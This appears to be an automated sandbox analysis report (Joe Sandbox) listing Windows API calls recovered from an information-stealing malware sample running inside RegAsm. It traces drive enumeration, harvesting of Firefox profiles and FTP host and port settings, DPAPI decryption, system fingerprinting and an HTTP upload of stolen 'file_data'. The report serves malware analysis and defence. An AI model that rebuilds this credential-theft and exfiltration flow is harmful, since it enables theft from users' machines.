                                                                                  • Part of subcall function 004153F6: _EH_prolog.MSVCRT ref: 004153FB
                                                                                  • Part of subcall function 004153F6: wsprintfA.USER32 ref: 00415421
                                                                                  • Part of subcall function 004153F6: FindFirstFileA.KERNEL32(?,?), ref: 00415438
                                                                                  • Part of subcall function 004153F6: memset.MSVCRT ref: 0041544F
                                                                                  • Part of subcall function 004153F6: memset.MSVCRT ref: 0041545D
                                                                                  • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,0042684C), ref: 0041547B
                                                                                  • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,00426850), ref: 00415495
                                                                                  • Part of subcall function 004153F6: wsprintfA.USER32 ref: 004154B9
                                                                                  • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,0042656E), ref: 004154CA
                                                                                  • Part of subcall function 004153F6: wsprintfA.USER32 ref: 004154F0
                                                                                  • Part of subcall function 004153F6: memset.MSVCRT ref: 00415516
                                                                                  • Part of subcall function 004153F6: lstrcat.KERNEL32(?,?), ref: 00415528
                                                                                  • Part of subcall function 004153F6: strtok_s.MSVCRT ref: 00415561
                                                                                  • Part of subcall function 004153F6: memset.MSVCRT ref: 00415576
                                                                                  • Part of subcall function 004153F6: lstrcat.KERNEL32(?,?), ref: 0041558B
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00415933
                                                                                • lstrlenA.KERNEL32(?), ref: 00415998
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$H_prologlstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
                                                                                • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                • API String ID: 2879972474-147700698
                                                                                • Opcode ID: 4245d552df83b068be1558a689d43aef9dea607818b0117f9054742c8dc341e5
                                                                                • Instruction ID: 8fb32ebea5ed90456f7ca7ea911cfe9f81c0b13f291b8680dac0f4474b3225bb
                                                                                • Opcode Fuzzy Hash: 4245d552df83b068be1558a689d43aef9dea607818b0117f9054742c8dc341e5
                                                                                • Instruction Fuzzy Hash: 395152B190025CEADF30AF61DC55EEE7B7DAF05344F50003ABA15A2191DB386A49CB59
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00401167
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                                • StrCmpCA.SHLWAPI(?,00422378), ref: 004013CA
                                                                                • StrCmpCA.SHLWAPI(?,0042237C), ref: 004013E4
                                                                                • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00422388,?,?,?,00422384,?,?,?,00422380,?,?), ref: 00401510
                                                                                  • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                  • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                  • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                  • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                  • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                  • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                • FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,0042238C), ref: 00401832
                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,0042238C), ref: 00401841
                                                                                • FindNextFileA.KERNEL32(?,?), ref: 00401BD4
                                                                                • FindClose.KERNEL32(?), ref: 00401BE5
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                  • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                  • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                  • Part of subcall function 0040618B: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                  • Part of subcall function 00414437: Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004144C0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileH_prolog$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                • String ID: 7$\*.*
                                                                                • API String ID: 40499504-4165053604
                                                                                • Opcode ID: 2415c5a552409a1327100fa76e5c65bacbb48c19f6e4dd66bfc40bef1be4ee54
                                                                                • Instruction ID: 8097af2253b6e43ffd1ff437b79a581fef85e219c3474a36129b1183f2ad689d
                                                                                • Opcode Fuzzy Hash: 2415c5a552409a1327100fa76e5c65bacbb48c19f6e4dd66bfc40bef1be4ee54
                                                                                • Instruction Fuzzy Hash: 04624D70904188EADB15EBE5C955BDDBBB8AF29308F5040BEA509735C2DF781B4CCB25
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040B468
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F68,?,?,00425C47,?,00000000,?), ref: 0040B4E7
                                                                                • StrCmpCA.SHLWAPI(?,00425F6C,?,00000000,?), ref: 0040B50B
                                                                                • StrCmpCA.SHLWAPI(?,00425F70,?,00000000,?), ref: 0040B525
                                                                                • StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F74,?,?,00425C4A,?,00000000,?), ref: 0040B5C1
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425F84,?,?,00000000,00425C4B,?,00000000,?), ref: 0040B6C6
                                                                                • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040B79B
                                                                                • FindNextFileA.KERNELBASE(?,?,?,00000000,?), ref: 0040B84A
                                                                                • FindClose.KERNEL32(?,?,00000000,?), ref: 0040B85B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileH_prologlstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                • String ID: prefs.js
                                                                                • API String ID: 2318033617-3783873740
                                                                                • Opcode ID: 5666919e8824e042d0b5f70852cf441639314b1659d2301ad99abcf42152bb5b
                                                                                • Instruction ID: be7758ef0e9bd93280a5f92db672ae0ad47210b716bb060d05ded798a66e6481
                                                                                • Opcode Fuzzy Hash: 5666919e8824e042d0b5f70852cf441639314b1659d2301ad99abcf42152bb5b
                                                                                • Instruction Fuzzy Hash: C9D18471900248EADB14EBE5C956BDDBBB4AF19304F5040BEE409B36C2DB781B4CCB66
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004094EA
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425E1C,?,?,00425BFA,?), ref: 00409567
                                                                                • StrCmpCA.SHLWAPI(?,00425E20), ref: 00409584
                                                                                • StrCmpCA.SHLWAPI(?,00425E24), ref: 0040959E
                                                                                • StrCmpCA.SHLWAPI(?,00000000,?,?,?,00425E28,?,?,00425BFB), ref: 00409635
                                                                                • StrCmpCA.SHLWAPI(?), ref: 004096B6
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00408759: _EH_prolog.MSVCRT ref: 0040875E
                                                                                  • Part of subcall function 00408759: CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00425DC8,?,?,?,00425BEA,00000000), ref: 00408841
                                                                                • FindNextFileA.KERNELBASE(00000000,?), ref: 0040989F
                                                                                • FindClose.KERNEL32(00000000), ref: 004098AE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                • String ID:
                                                                                • API String ID: 322284088-0
                                                                                • Opcode ID: e559499c3d2ef85a473f19cc83e64b7af054a451df30679cf9fec3c86fffa07d
                                                                                • Instruction ID: f469bbe6791ff6929fd52be51ed7484ae91504fa3db0a5c2044313ffea23fdba
                                                                                • Opcode Fuzzy Hash: e559499c3d2ef85a473f19cc83e64b7af054a451df30679cf9fec3c86fffa07d
                                                                                • Instruction Fuzzy Hash: 73C17270900249EADF10EBA5D9167DDBFB8AB09304F10417EE844B36C2DB785B08CBA6
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040FCEA
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • GetKeyboardLayoutList.USER32(00000000,00000000,004262AF,00000001,?,00000000), ref: 0040FD1C
                                                                                • LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD2A
                                                                                • GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD35
                                                                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FD5F
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • LocalFree.KERNEL32(?), ref: 0040FE03
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcpy$H_prologKeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                • String ID: /
                                                                                • API String ID: 2868853201-4001269591
                                                                                • Opcode ID: 8e81c3fcb6512392ecb3f0709d7808244dc03f0de8ce522feb2af1cedb86ee9d
                                                                                • Instruction ID: 670fa807c41248f436aa2cd72aaefdfaece762a4e3a61ecb974f96717b874319
                                                                                • Opcode Fuzzy Hash: 8e81c3fcb6512392ecb3f0709d7808244dc03f0de8ce522feb2af1cedb86ee9d
                                                                                • Instruction Fuzzy Hash: D231EDB1901119EFDB10EFE5D885AEEBBB9EF48304F54407EE509B3681C7785A88CB64
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004106C9
                                                                                • CoCreateInstance.OLE32(00426D5C,00000000,00000001,00426488,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004106F0
                                                                                • SysAllocString.OLEAUT32(?), ref: 004106FD
                                                                                • _wtoi64.MSVCRT ref: 00410738
                                                                                • SysFreeString.OLEAUT32(?), ref: 0041074B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00410752
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: String$Free$AllocCreateH_prologInstance_wtoi64
                                                                                • String ID:
                                                                                • API String ID: 1816492551-0
                                                                                • Opcode ID: 5a519e56b5a3f35fac8b8731372418453ffdd9c68a54ed5590e156cd5d61d494
                                                                                • Instruction ID: 38727b362cf05651e2ba0c167973076b7eb5e8e7f8c877263c03ca4ede2a4bf2
                                                                                • Opcode Fuzzy Hash: 5a519e56b5a3f35fac8b8731372418453ffdd9c68a54ed5590e156cd5d61d494
                                                                                • Instruction Fuzzy Hash: A921A571A00109AFCB00DFA4DD889EE7BB5FF88304B60846EF515E7250C7B59D85CB64
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004111C3
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004111E9
                                                                                • Process32First.KERNEL32(00000000,00000128), ref: 004111F9
                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 0041120B
                                                                                • StrCmpCA.SHLWAPI(?,?,?,?,00000000), ref: 0041121F
                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00411232
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 186290926-0
                                                                                • Opcode ID: a9f169bdbb2cdc4e9d02c35b7c1d11867838652ed038367759a7d765107c7668
                                                                                • Instruction ID: 368edb313bfa2f31f76f5ba6fbd020b911e3fe3703e22c74ac1c99050383bae8
                                                                                • Opcode Fuzzy Hash: a9f169bdbb2cdc4e9d02c35b7c1d11867838652ed038367759a7d765107c7668
                                                                                • Instruction Fuzzy Hash: 56015A71900028AFDB119F95DD48ADEBBB9EF86300F204096F505F2220D7788F84CFA5
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCA3
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCAA
                                                                                • GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCB9
                                                                                • wsprintfA.USER32 ref: 0040FCD7
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                • String ID:
                                                                                • API String ID: 362916592-0
                                                                                • Opcode ID: 0604e6eb6e2682e20b2124677ba798e9b04fc5edbfebe48aceeb8ffeb4b62a16
                                                                                • Instruction ID: c4178db3a7b5cadc3d34117ce99b3585a5539fb9734740f51f0b0a417066b3ea
                                                                                • Opcode Fuzzy Hash: 0604e6eb6e2682e20b2124677ba798e9b04fc5edbfebe48aceeb8ffeb4b62a16
                                                                                • Instruction Fuzzy Hash: 00E09275700234BBEB1067A8AC0EF87366EAB06725F111262FA15D21D0E6B499048AE5
                                                                                APIs
                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
                                                                                • LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
                                                                                • LocalFree.KERNEL32(?), ref: 004062FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                • String ID:
                                                                                • API String ID: 2068576380-0
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,004265C7), ref: 0040FBD7
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00417274,004265C7), ref: 0040FBDE
                                                                                • GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocNameProcessUser
                                                                                • String ID:
                                                                                • API String ID: 1206570057-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoSystemwsprintf
                                                                                • String ID:
                                                                                • API String ID: 2452939696-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004043B2
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                  • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                  • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00404421
                                                                                  • Part of subcall function 00410DAC: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DD0
                                                                                  • Part of subcall function 00410DAC: GetProcessHeap.KERNEL32(00000000,?,?,00404415,?,?,?,?,?,?), ref: 00410DDD
                                                                                  • Part of subcall function 00410DAC: HeapAlloc.KERNEL32(00000000,?,00404415,?,?,?,?,?,?), ref: 00410DE4
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • StrCmpCA.SHLWAPI(?,004259DF,004259DB,004259D3,004259CF,004259CE), ref: 004044A4
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                                                                • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004045E9
                                                                                • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00404623
                                                                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404647
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00425A98,00000000,?,?,00000000), ref: 00404B42
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00404B54
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404B66
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00404B6D
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00404B7F
                                                                                • memcpy.MSVCRT ref: 00404B92
                                                                                • lstrlenA.KERNEL32(00000000,?,?), ref: 00404BA9
                                                                                • memcpy.MSVCRT ref: 00404BB3
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00404BC4
                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404BDD
                                                                                • memcpy.MSVCRT ref: 00404BEA
                                                                                • lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404BFF
                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404C10
                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404C37
                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404CB9
                                                                                • StrCmpCA.SHLWAPI(00000000,block), ref: 00404CD1
                                                                                • ExitProcess.KERNEL32 ref: 00404CDC
                                                                                • InternetCloseHandle.WININET(?), ref: 00404CEC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$Internet$lstrcpy$H_prologHeap$HttpProcessmemcpy$AllocOpenRequestlstrcat$BinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
                                                                                • String ID: ------$"$"$"$"$--$------$------$------$------$/$ERROR$ERROR$block$build_id$file_data
                                                                                • API String ID: 2658035217-3274521816

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040BBED
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                  • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                  • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                  • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                  • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                  • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                  • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                • strtok_s.MSVCRT ref: 0040BCCB
                                                                                • GetProcessHeap.KERNEL32(00000000,000F423F,00425C9B,00425C9A,00425C97,00425C96), ref: 0040BD1F
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040BD26
                                                                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040BD3A
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040BD45
                                                                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040BD7D
